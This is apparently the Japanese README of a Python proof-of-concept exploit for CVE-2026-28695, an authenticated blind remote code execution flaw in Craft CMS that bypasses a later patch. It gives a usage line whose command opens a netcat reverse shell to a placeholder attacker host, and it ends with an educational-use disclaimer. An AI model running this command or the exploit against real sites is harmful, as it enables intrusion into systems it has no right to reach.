
CVE-2026-28695 の Python PoC エクスプロイト。Craft CMS における認証済みブラインド RCE であり、create() BaseObject パッチをバイパスしてリバースシェルを起動します。
Craft CMS における認証済みブラインドリモートコード実行。CVE-2026-28695 の修正(コミット e31e508)で追加された create() - BaseObject 制限をバイパスします。
python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'
このスクリプトは教育目的のみを意図しています。作者は、このエクスプロイトによるいかなる誤用や損害についても責任を負いません。脆弱性をテストまたは悪用する前に、必ず許可を得ていることを確認してください!